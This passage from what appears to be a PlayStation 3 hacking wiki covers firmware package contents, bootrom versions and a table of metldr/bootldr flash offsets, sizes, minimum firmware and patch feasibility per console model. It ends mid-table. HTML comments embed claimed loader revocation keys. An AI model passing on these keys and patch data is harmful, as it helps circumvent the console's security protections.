CORE_OS_PACKAGE.pkg ======<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! File Entry ID !! Filename<br /> |-<br /> | || aim_spu_module.self<br /> |-<br /> | || appldr<br /> |-<br /> | || creserved_0<br /> |-<br /> | || default.spp<br /> |-<br /> | || isoldr<br /> |-<br /> | || lv0<br /> |-<br /> | || lv1.self<br /> |-<br /> | || lv1ldr<br /> |-<br /> | || lv2_kernel.self<br /> |-<br /> | || lv2ldr<br /> |-<br /> | || mc_iso_spu_module.self<br /> |-<br /> | || me_iso_spu_module.self<br /> |-<br /> | || rvkldr<br /> |-<br /> | || sb_iso_spu_module.self<br /> |-<br /> | || sc_iso.self<br /> |-<br /> | || sdk_version<br /> |-<br /> | || spp_verifier.self<br /> |-<br /> | || spu_pkg_rvk_verifier.self<br /> |-<br /> | || spu_token_processor.self<br /> |-<br /> | || sv_iso_spu_module.self<br /> |-<br /> | || sys_init_app.self<br /> |-<br /> | || sys_init_ios.self<br /> |-<br /> | || sysctl.txt<br /> |-<br /> |}<br /> <br /> === known updates ===<br /> <br /> ==== 0.2 ebootrom ====<br /> <br /> ==== 0.3 ebootrom ====<br /> <br /> ==== 0.60 ebootrom ====<br /> &lt;pre&gt; 0.60: lv0 contains string : 'Sony CXD9823 NAND Controller'&lt;/pre&gt;<br /> &lt;pre&gt;Boot Loader SE Version 0.6 2006-01-31_13:53:04&lt;/pre&gt;<br /> &lt;pre&gt;Boot Loader SE Version 0.5.2005-12-28_16:10:53&lt;/pre&gt;<br /> <br /> ==== 0.80 ebootrom ====<br /> &lt;pre&gt; key: rev 0x00&lt;/pre&gt;<br /> <br /> ==== 0.84 ebootrom ====<br /> &lt;pre&gt; 0.84: lv0 doesnt contain previous mentioned string&lt;/pre&gt;<br /> &lt;pre&gt;from decrypted lv0 0.84: Boot Loader SE Version 0.8.4 (Build ID: 822,8517, Build Data: 2006-05-16_17:50:21)&lt;/pre&gt;<br /> <br /> ==== 0.85 ebootrom ====<br /> <br /> ==== 0.90 ebootrom ====<br /> <br /> ==== 0.90 PUP ====<br /> &lt;pre&gt; ? 0.90: PS3UPDAT.PUP format was implemented since 0.90 ?&lt;/pre&gt;<br /> <br /> ==== 0.92 ebootrom ====<br /> &lt;pre&gt; key: rev 0x01 + NP rev 0x01&lt;/pre&gt;<br /> <br /> ==== 0.93 ebootrom ====<br /> <br /> ==== 0.94 ebootrom ====<br /> <br /> ==== 0.95 PUP ====<br /> <br /> ==== 0.96 PUP ====<br /> <br /> ==== 100.002 ebootrom ====<br /> &lt;pre&gt;from decrypted lv0: Boot Loader SE Version 1.0.0 (Build ID: 1643,16413, Build Data: 2006-10-05_16:32:34)&lt;/pre&gt;<br /> [http://www.multiupload.com/FZHV557R2J ebootrom.100.002.rar (51.29 MB)]<br /> <br /> * https://mega.co.nz/#!YgsziJjT!j4EzExE18pmIrv6a2ITbfMrRPollgzPdpvTjze1CuEc</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Template:Metbootldr&diff=43596 Template:Metbootldr 2017-02-20T16:04:27Z <p>Mathieulh: Fixed the template and the lowest DECR-1000 version.</p> <hr /> <div>You can check [[:File:Asecure loader-metldr.png|metldr]] and [[:File:Bootldr 0.png|bootldr]] sizes easily with [http://mh-nexus.de/en/hxd/ HxD]<br /> * either after extracting flash with [[Validating_flash_dumps#Flowrebuilder|Flowrebuilder]] and opening seperate files<br /> * or by looking in the unextracted Flash dump at the correct offset.<br /> This table lists some common known values for your convenience as quick lookup:<br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! [[IDPS]]/[[Target_ID]] !! rowspan=&quot;2&quot; | [[SKU_Models#Datecode_.2F_Manufacturing_Date|SKU - Datecode / Manufacturing date]] !! colspan=&quot;2&quot; | [[Flash:asecure_loader|metldr offset]] !! colspan=&quot;3&quot; | [[Flash:bootldr|bootldr]] !! rowspan=&quot;2&quot; | Notes !! rowspan=&quot;2&quot; | [[Talk:Playstation_Update_Package_%28PUP%29#Using_fake_upgrade_to_get_lowest_firmware_version_info|lowest&lt;br /&gt;known&lt;br /&gt;firmware]]<br /> |-<br /> ! &lt;small&gt;0x2F077&amp;nbsp;(NOR)&lt;br /&gt;0x80877&amp;nbsp;(NAND)&lt;/small&gt; !! &lt;small&gt;0x81E&amp;nbsp;(NOR)&lt;br /&gt;0x4081E&amp;nbsp;(NAND)&lt;/small&gt; !! &lt;small&gt;0x842&amp;nbsp;(NOR)&lt;br /&gt;0x40842&amp;nbsp;(NAND)&lt;/small&gt; !! &lt;small&gt;&lt;abbr title=&quot;( header * 0x10 ) + 0x40 = size&quot;&gt;size&lt;/abbr&gt;&lt;/small&gt; !! &lt;small&gt;0xFC0002&amp;nbsp;(NOR)&lt;br /&gt;0x02&amp;nbsp;(NAND)&lt;/small&gt; !! &lt;small&gt;0xFC0012&amp;nbsp;(NOR)&lt;br /&gt;0x12&amp;nbsp;(NAND)&lt;/small&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | n/a || [[CEB-2030]]&amp;nbsp;([[MPU-501#TMU-520|MPU-501]])&amp;nbsp;{{PROTO}} || style=&quot;text-align:center;&quot; | n/a || style=&quot;text-align:center;&quot; | n/a || style=&quot;text-align:center;&quot; | 28C20 || style=&quot;text-align:center;&quot; | 28 BE || style=&quot;text-align:center;&quot; | 28 BE || &lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;&amp;lt;=0.50.003&lt;/span&gt;&lt;!--// lv0ldr rev key: C02E2FEAF61CA6F1CCC88B5F Mathieulh-2012-12-16 All secure loaders are 00 paired, loader do not use self format, All selfs skip the CBC step, ldrs use AES128CTR keys to decrypt self files//--&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 01 || [[DEH-Z1010]]&amp;nbsp;([[TMU-520#TMU-520|TMU-520]])&amp;nbsp;{{SD}}|| style=&quot;text-align:center;&quot; | 14 20 || style=&quot;text-align:center;&quot; | 11 3E || style=&quot;text-align:center;&quot; | 2D020 || style=&quot;text-align:center;&quot; | 2C FE || style=&quot;text-align:center;&quot; | 2C FE || &lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;&amp;lt;=0.80.004&lt;/span&gt;&lt;!--// metldr rev key: EC3997BBEFFCA7497E70526F BL rev key: 805BF2D9ACD20061B699BB96 Mathieulh-2012-12-16 Metldr/bl are 00 Paired Different keysets are being used on sysdbg firmwares//--&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 01 || [[DECR-1000]]&amp;nbsp;([[TMU-520#TMU-520|TMU-520]])&amp;nbsp;{{DECR}} Every DECR manufactured before January 2009 Share the same BL/Metldr revisions || style=&quot;text-align:center;&quot; | EC 40 || style=&quot;text-align:center;&quot; | 0E C0 || style=&quot;text-align:center;&quot; | 2A840 || style=&quot;text-align:center;&quot; | 2A 80 || style=&quot;text-align:center;&quot; | 2A 80 || &lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;&amp;lt;=0.85.010&lt;/span&gt;&lt;!--// metldr rev key: 664566FA7788F8432FB7AA62 BL rev key: 444890DD192C912DBB996FC8 Mathieulh-2012-12-16 //--&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 01 || ?DEH-H1001-D?&amp;nbsp;([[COK-00x#COK-001|COOKIE13]])&amp;nbsp;{{CEX}} || style=&quot;text-align:center;&quot; | EC 40 || style=&quot;text-align:center;&quot; | 0E C0 || style=&quot;text-align:center;&quot; | 2A830 || style=&quot;text-align:center;&quot; | 2A 7F || style=&quot;text-align:center;&quot; | 2A 7F || &lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;&amp;lt;=0.85.010&lt;/span&gt;&lt;!--// 00 00 00 01 00 83 00 01 10 00 00 5A 17 CD E0 F5 SkyDrive-2012-12-04\COOKIE-13 //--&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 01 || [[DEH-H1000A-E]]&amp;nbsp;([[COK-00x#COK-001|COK-001]])&amp;nbsp;{{DEX}} || style=&quot;text-align:center;&quot; | EC 70 || style=&quot;text-align:center;&quot; | 0E C3 || style=&quot;text-align:center;&quot; | 2A1E0 || style=&quot;text-align:center;&quot; | 2A 1A || style=&quot;text-align:center;&quot; | 2A 1A || &lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;&amp;lt;095.001&lt;/span&gt;&lt;!--// Strike Venom-2012-12-16 //--&gt; &lt;!-- The revision of the met-/bootldr is newer, as these console's were only used by Sony for there Tech-Demos and have been updated (several?) times to match the current state of development. Source: Old SDK info's refer to an system update/upgrade that remove's the ability to downgrade below a specific value. (It refer's to DEH-R... and a factory software upgrade) So there's no way to get the original data :(--&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 01&lt;br /&gt;04 || [[CECHAxx|CECHAxx]]&amp;nbsp;([[COK-00x#COK-001|COK-001]])&lt;br /&gt;[[CECHExx|CECHExx]]&amp;nbsp;([[COK-00x#COK-001|COK-002]]) || style=&quot;text-align:center;&quot; | EE 10 || style=&quot;text-align:center;&quot; | 0E DD || style=&quot;text-align:center;&quot; | 2A430 || style=&quot;text-align:center;&quot; | 2A 3F || style=&quot;text-align:center;&quot; | 2A 3F || &lt;!--//bluemimmo: CECHA06 NAND FAT//--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.00&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.00&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 01&lt;br /&gt;02&lt;br /&gt;03&lt;br /&gt;01 || [[CECHAxx|CECHAxx]]&amp;nbsp;([[COK-00x#COK-001|COK-001]]) with 1.00&amp;nbsp;from&amp;nbsp;factory&lt;br /&gt;[[CECHBxx|CECHBxx]]&amp;nbsp;([[COK-00x#COK-001|COK-001]])&lt;br /&gt;[[CECHCxx|CECHCxx]]&amp;nbsp;([[COK-00x#COK-001|COK-002]])&lt;br /&gt;[[DECHAxx|DECHAxx]]&amp;nbsp;([[COK-00x#COK-001|COK-001]])&amp;nbsp;{{DEX}} || style=&quot;text-align:center;&quot; | ED A0 || style=&quot;text-align:center;&quot; | 0E D6 || style=&quot;text-align:center;&quot; | 2A2E0 || style=&quot;text-align:center;&quot; | 2A 2A || style=&quot;text-align:center;&quot; | 2A 2A || &lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.00&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.00&lt;/span&gt;&lt;!--// CatisFine: CECHB 27430205 //--&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.00&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.00&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 03 || [[CECHCxx|CECHCxx]]&amp;nbsp;([[COK-00x#COK-002|COK-002]]) with 1.00&amp;nbsp;from&amp;nbsp;factory || style=&quot;text-align:center;&quot; | EB F0 || style=&quot;text-align:center;&quot; | 0E BB || style=&quot;text-align:center;&quot; | 30480 || style=&quot;text-align:center;&quot; | 30 44 || style=&quot;text-align:center;&quot; | 30 44 || &lt;!--//euss: CECHC04 NAND FAT//--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.00&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.00&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 01&lt;br /&gt;02&lt;br /&gt;03 || [[CECHAxx|CECHAxx]]&amp;nbsp;([[COK-00x#COK-001|COK-001]])&lt;br /&gt;[[CECHBxx|CECHBxx]]&amp;nbsp;([[COK-00x#COK-001|COK-001]])&lt;br /&gt;[[CECHCxx|CECHCxx]]&amp;nbsp;([[COK-00x#COK-002|COK-002]]) || style=&quot;text-align:center;&quot; | ED E0 || style=&quot;text-align:center;&quot; | 0E DA || style=&quot;text-align:center;&quot; | 2A3B0 || style=&quot;text-align:center;&quot; | 2A 37 || style=&quot;text-align:center;&quot; | 2A 37 || &lt;!--//meisterma-NAND-370a CECHC04 //--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.00&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.00&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.00&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 04&lt;br /&gt;05 || [[Namco System 357]]&amp;nbsp;([[COK-00x#COK-002|COK-002]])&amp;nbsp;{{ARC}}&lt;br /&gt;[[CECHGxx|CECHGxx]]&amp;nbsp;([[SEM-00x|SEM-001]]) || style=&quot;text-align:center;&quot; | E7 B0 || style=&quot;text-align:center;&quot; | 0E 77 || style=&quot;text-align:center;&quot; | 2E900 || style=&quot;text-align:center;&quot; | 2E 8C || style=&quot;text-align:center;&quot; | 2E 8C || &lt;!--//john__: NAND FAT SEM-001//--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;?1.90?&lt;br /&gt;1.90&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 05&lt;br /&gt;06 || [[CECHGxx|CECHGxx]]&amp;nbsp;([[SEM-00x|SEM-001]])&lt;br /&gt;[[CECHHxx|CECHHxx]]&amp;nbsp;([[DIA-00x|DIA-001]]) || style=&quot;text-align:center;&quot; | E7 B0 || style=&quot;text-align:center;&quot; | 0E 77 || style=&quot;text-align:center;&quot; | 2F200 || style=&quot;text-align:center;&quot; | 2F 1C || style=&quot;text-align:center;&quot; | 2F 1C || &lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;2.30&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;2.30&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 05&lt;br /&gt;06 || [[CECHGxx|CECHGxx]]&amp;nbsp;([[SEM-00x|SEM-001]])&lt;br /&gt;[[CECHHxx|CECHHxx]]&amp;nbsp;([[DIA-00x|DIA-001]]) || style=&quot;text-align:center;&quot; | E8 C0 || style=&quot;text-align:center;&quot; | 0E 88 || style=&quot;text-align:center;&quot; | 2EF80 || style=&quot;text-align:center;&quot; | 2E F4 || style=&quot;text-align:center;&quot; | 2E F4 || &lt;!--//aliese: CECHH00 DIA-001 NTSC-J with Spansion S29GL128N90TFIR2 //--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;2.30&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;2.30&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 06&lt;br /&gt;07 || [[CECHHxx|CECHHxx]]&amp;nbsp;([[DIA-00x|DIA-001]])&lt;br /&gt;[[CECHJxx|CECHJxx]]&amp;nbsp;([[DIA-00x|DIA-002]]) with&amp;nbsp;2.30&amp;nbsp;from&amp;nbsp;factory - datecode&amp;nbsp;8B || style=&quot;text-align:center;&quot; | E8 E0 || style=&quot;text-align:center;&quot; | 0E 8A || style=&quot;text-align:center;&quot; | 2EF80 || style=&quot;text-align:center;&quot; | 2E F4 || style=&quot;text-align:center;&quot; | 2E F4 || &lt;!--//akex: CECHH04 DIA-001 with Spansion S29GL128N90TFIR2 //--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.97&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;2.30&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 03&lt;br /&gt;06&lt;br /&gt;06 || [[CECHExx|CECHExx]]&amp;nbsp;([[COK-00x#COK-001|COK-002]])&lt;br /&gt;[[CECHHxx|CECHHxx]]&amp;nbsp;([[DIA-00x|DIA-001]])&lt;br /&gt;[[CECHMxx|CECHMxx]]&amp;nbsp;([[DIA-00x|DIA-001]]) || style=&quot;text-align:center;&quot; | EA 60 || style=&quot;text-align:center;&quot; | 0E A2 || style=&quot;text-align:center;&quot; | 2EE70 || style=&quot;text-align:center;&quot; | 2E E3 || style=&quot;text-align:center;&quot; | 2E E3 || &lt;!--// &lt;GaBBa_TeR&gt; serial 02-27437970-0504142-CECHM03 DIA-001 minver1.97 - perhaps Sony reused H series with new stickers for early M series. that explains the difference between 06/DIA001 and 08/VER001 for that particular console (stickers, serial and box checkout being M, flash checked out as H series//--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.97&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;1.97&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 07 || [[CECHJxx|CECHJxx]]&amp;nbsp;([[DIA-00x|DIA-002]])&lt;br /&gt;[[CECHKxx|CECHKxx]]&amp;nbsp;([[DIA-00x|DIA-002]]) datecode&amp;nbsp;8C || style=&quot;text-align:center;&quot; | EA 60 || style=&quot;text-align:center;&quot; | 0E A2 || style=&quot;text-align:center;&quot; | 2EE70 || style=&quot;text-align:center;&quot; | 2E E3 || style=&quot;text-align:center;&quot; | 2E E3 || &lt;!--//cechj 40gb / chipps3ve: DIA-002 with Spansion // alex-07 CECHK04 //--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;2.30&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 08&lt;br /&gt;07&lt;br/&gt;08 || [[Namco System 357]]&amp;nbsp;([[VER-00x|VER-001]])&amp;nbsp;{{ARC}}&lt;br /&gt;[[DECHJxx]]&amp;nbsp;([[DIA-00x|DIA-002]])&amp;nbsp;{{DEX}}&lt;br/&gt;[[CECHLxx|CECHLxx]] / [[CECHPxx|CECHPxx]]&amp;nbsp;([[VER-00x|VER-001]]) || style=&quot;text-align:center;&quot; | E8 D0 || style=&quot;text-align:center;&quot; | 0E 89 || style=&quot;text-align:center;&quot; | 2EAF0 || style=&quot;text-align:center;&quot; | 2E AB || style=&quot;text-align:center;&quot; | 2E AB || &lt;!--//Abkarino, anger, defyboy, ir0nman, spox_2 //--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;?2.45?&lt;br /&gt;2.16&lt;br/&gt;2.45&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 08 || [[CECHLxx|CECHLxx]]&amp;nbsp;([[VER-00x|VER-001]]) || style=&quot;text-align:center;&quot; | E8 D0 || style=&quot;text-align:center;&quot; | 0E 89 || style=&quot;text-align:center;&quot; | 2EB70 || style=&quot;text-align:center;&quot; | 2E B3 || style=&quot;text-align:center;&quot; | 2E B3 || &lt;!--//Dado, ir0nman//--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;2.45&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 08&lt;br /&gt;09 || [[CECHLxx|CECHLxx]]&amp;nbsp;([[VER-00x|VER-001]]) with&amp;nbsp;2.30&amp;nbsp;from&amp;nbsp;factory - datecode&amp;nbsp;unknown&lt;br /&gt;[[CECH-20xx|CECH-20xx]]&amp;nbsp;([[DYN-00x|DYN-001]]) with&amp;nbsp;2.76&amp;nbsp;from&amp;nbsp;factory, datecode unknown || style=&quot;text-align:center;&quot; | E8 90 || style=&quot;text-align:center;&quot; | 0E 85 || style=&quot;text-align:center;&quot; | 2F170 || style=&quot;text-align:center;&quot; | 2F 13 || style=&quot;text-align:center;&quot; | 2F 13 || &lt;!--//Val, Freeplex, Abkarino:CECHL04-VER001 //--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;2.30&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;2.70&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 09 || [[DECR-1400|DECR-1400]]&amp;nbsp;([[DEB-001|DEB-001]])&amp;nbsp;{{DECR}} with&amp;nbsp;2.60&amp;nbsp;from&amp;nbsp;factory - manufacture date&amp;nbsp;June 09&lt;br /&gt; || style=&quot;text-align:center;&quot; | E8 90 || style=&quot;text-align:center;&quot; | 0E 85 || style=&quot;text-align:center;&quot; | 2F170 || style=&quot;text-align:center;&quot; | 2F 13 || style=&quot;text-align:center;&quot; | 2F 13 || &lt;!--//Val, Freeplex, Abkarino:CECHL04-VER001 //--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;2.60&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 09 || [[CECH-20xx|CECH-20xx]]&amp;nbsp;([[DYN-00x|DYN-001]]) || style=&quot;text-align:center;&quot; | E9 20 || style=&quot;text-align:center;&quot; | 0E 8E || style=&quot;text-align:center;&quot; | 2F3F0 || style=&quot;text-align:center;&quot; | 2F 3B || style=&quot;text-align:center;&quot; | 2F 3B || &lt;!--//nikitis CECH-2001A//--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;2.70&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 0A || [[CECH-21xx|CECH-21xx]]&amp;nbsp;([[SUR-00x|SUR-001]]) || style=&quot;text-align:center;&quot; | E9 20 || style=&quot;text-align:center;&quot; | 0E 8E || style=&quot;text-align:center;&quot; | 2F4F0 || style=&quot;text-align:center;&quot; | 2F 4B || style=&quot;text-align:center;&quot; | 2F 4B || &lt;!--// zax:CECH-2106A //--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;3.20&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 03&lt;br /&gt;0B&lt;br /&gt;0B || [[CECHExx|CECHExx]]&amp;nbsp;([[COK-00x#COK-002W|COK-002W]]) refurbished&lt;br /&gt;[[CECH-25xx|CECH-25xx]]&amp;nbsp;([[JTP-00x|JTP-001]]) with&amp;nbsp;3.40&amp;nbsp;from factory - &lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;datecode&amp;nbsp;0C&lt;/span&gt;&lt;br /&gt;[[CECH-25xx|CECH-25xx]]&amp;nbsp;([[JSD-00x|JSD-001]]) with&amp;nbsp;3.41&amp;nbsp;from&amp;nbsp;factory - &lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;datecode&amp;nbsp;0C&lt;/span&gt; || style=&quot;text-align:center;&quot; | E9 20 || style=&quot;text-align:center;&quot; | 0E 8E || style=&quot;text-align:center;&quot; | 2F4F0 || style=&quot;text-align:center;&quot; | 2F 4B || style=&quot;text-align:center;&quot; | 2F 4B || &lt;!--//domelec, ogy, Ir0nman, nice69, Marcocanc, sandugas:CECH-2504B (unknow mobo) with 3.40 from factory - datecode 0C, avati:(CECHE04/COK-002W) //--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;3.40&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;3.40&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;3.40&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 0B&lt;br /&gt;0B || [[CECH-25xx|CECH-25xx]]&amp;nbsp;([[JSD-00x|JSD-001]]) with&amp;nbsp;3.56&amp;nbsp;from&amp;nbsp;factory - &lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;datecode&amp;nbsp;0D&lt;/span&gt;&lt;br /&gt;[[CECH-25xx|CECH-25xx]]&amp;nbsp;([[JTP-00x|JTP-001]]) with&amp;nbsp;3.56&amp;nbsp;from&amp;nbsp;factory - &lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;datecode&amp;nbsp;1A&lt;/span&gt; || style=&quot;text-align:center;&quot; | E9 60 || style=&quot;text-align:center;&quot; | 0E 92 || style=&quot;text-align:center;&quot; | 2F570 || style=&quot;text-align:center;&quot; | 2F 53 || style=&quot;text-align:center;&quot; | 2F 53 || &lt;!--//Freemagne, ciariello, aftab//--&gt;&lt;span style=&quot;color:#30C030; background-color:#FFFFFF; &quot;&gt;Patch + FSM = OK&lt;/span&gt; || style=&quot;background-color:#30C030; color:white;&quot; | &lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;3.50&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color:#30C030; color:white;&quot;&gt;3.50&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center;&quot; | 0B&lt;br /&gt;0B&lt;br /&gt;0B&lt;br /&gt; || [[CECH-25xx|CECH-25xx]]&amp;nbsp;([[JTP-00x|JTP-001]]) with&amp;nbsp;3.56&amp;nbsp;from&amp;nbsp;factory - &lt;span style=&quot;color:#FFCC00; background-color:#FFFFFF; &quot;&gt;datecode&amp;nbsp;1A&lt;/span&gt;&amp;nbsp;(rare)&lt;br /&gt;[[CECH-25xx|CECH-25xx]]&amp;nbsp;([[JSD-00x|JSD-001]]) with&amp;nbsp;3.56&amp;nbsp;from&amp;nbsp;factory - &lt;span style=&quot;color:#FFCC00; background-color:#FFFFFF; &quot;&gt;datecode&amp;nbsp;1B&lt;/span&gt;&amp;nbsp;(common)&lt;br /&gt;[[CECH-25xx|CECH-25xx]]&amp;nbsp;([[JTP-00x|JTP-001]]) with&amp;nbsp;3.56&amp;nbsp;from&amp;nbsp;factory - &lt;span style=&quot;color:#FFCC00; background-color:#FFFFFF; &quot;&gt;datecode&amp;nbsp;1B&lt;/span&gt;&amp;nbsp;(common) || style=&quot;text-align:center;&quot; | E9 60 || style=&quot;text-align:center;&quot; | 0E 92 || style=&quot;text-align:center;&quot; | 2F5F0 || style=&quot;text-align:center;&quot; | 2F 5B || style=&quot;text-align:center;&quot; | 2F 5B || &lt;!--//BWE:cech-2501a-jtp-001-1A, bluemmimo:cech-2501a-jtp-001-1b, 